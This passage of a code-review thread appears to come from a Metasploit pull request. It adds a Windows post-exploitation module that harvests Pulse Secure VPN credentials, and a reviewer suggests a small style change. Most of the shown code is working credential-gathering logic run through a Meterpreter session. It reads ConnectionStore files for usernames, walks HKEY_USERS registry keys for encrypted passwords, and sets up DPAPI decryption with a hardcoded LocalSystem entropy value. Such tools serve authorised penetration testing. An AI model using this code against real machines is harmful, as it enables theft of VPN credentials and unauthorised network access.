modules/post/windows/gather/credentials/pulse_secure.rb

```diff
@@ -0,0 +1,369 @@
+  # the actual username used to establish the VPN connection if the module
+  # was run as the SYSTEM user.
+  #
+  # @return [String, nil] the username used by user linked to `sid` when establishing
+  # a connection with IVE `ive_index`, nil if none.
+  #
+  def get_username(sid, ive_index)
+    paths = [
+      "C:\\ProgramData\\Pulse Secure\\ConnectionStore\\#{sid}.dat",
+      "C:\\ProgramData\\Pulse Secure\\ConnectionStore\\#{sid}.bak",
+    ]
+    begin
+      if !is_system?
+        return nil
+      end
+      paths.each do |path|
+        next unless session.fs.file.exist?(path)
+
+        connstore_data = session.fs.file.open(path).read.to_s
+        matches = connstore_data.scan(/userdata "([a-z0-9]*)" {.*?username: "([^"]*)".*?}/m)
+        matches.each do |m|
+          if m[0] == ive_index
+            return m[1]
+          end
+        end
+      end
+    rescue Rex::Post::Meterpreter::RequestError => e
+      vprint_error(e.message)
+    end
+    return nil
+  end
+
+  # Implements IVE index to pOptionalEntropy value like Pulse Secure Connect
+  # client does.
+  #
+  # @return [String] pOptionalEntropy representation of `ive_index`.
+  #
+  def get_entropy_from_ive_index(ive_index)
+    return "IVE:#{ive_index.upcase}"
+  end
+
+  def find_creds
+
+    # If we execute with elevated privileges, we can go through all registry values
+    # so we load all profiles. If we run without privileges, we just load our current
+    # user profile. We have to do that otherwise we try to access registry values that
+    # we are not allwoed to, triggering a 'Profile doesn't exist or cannot be accessed'
+    # error.
+    if is_system?
+      profiles = grab_user_profiles
+    else
+      profiles = [{ 'SID' => session.sys.config.getsid }]
+    end
+    creds = []
+    # we get connection ives
+    ives = find_ives
+    # for each user profile, we check for potential connection ive
+    profiles.each do |profile|
+      key_names = registry_enumkeys("HKEY_USERS\\#{profile['SID']}\\Software\\Pulse Secure\\Pulse\\User Data")
+      key_names.each do |key_name|
+        ive_index = key_name[4..-1] # remove 'ive:'
+        # We get the encrypted password value from registry
+        reg_path = "HKEY_USERS\\#{profile['SID']}\\Software\\Pulse Secure\\Pulse\\User Data\\ive:#{ive_index}"
+        vals = registry_enumvals(reg_path)
+
+        next unless vals
+
+        vals.each do |val|
+          data = registry_getvaldata(reg_path, val)
+          if is_system?
+            if !data.starts_with?("{\x00c\x00a\x00p\x00i\x00}\x00 \x001\x00,")
+              next
+            else
+              # this means data was encrypted by elevated user using LocalSystem scope and fixed
+              # pOptionalEntropy value, adjusting parameters
+              data = [Rex::Text.to_ascii(data[18..-3])].pack('H*')
+              entropy = ['7B4C6492B77164BF81AB80EF044F01CE'].pack('H*')
+            end
```

Comment:
Redundant `else` after `next` guard.

```suggestion
            next unless data.starts_with?("{\x00c\x00a\x00p\x00i\x00}\x00 \x001\x00,")

            # this means data was encrypted by elevated user using LocalSystem scope and fixed
            # pOptionalEntropy value, adjusting parameters
            data = [Rex::Text.to_ascii(data[18..-3])].pack('H*')
            entropy = ['7B4C6492B77164BF81AB80EF044F01CE'].pack('H*')
```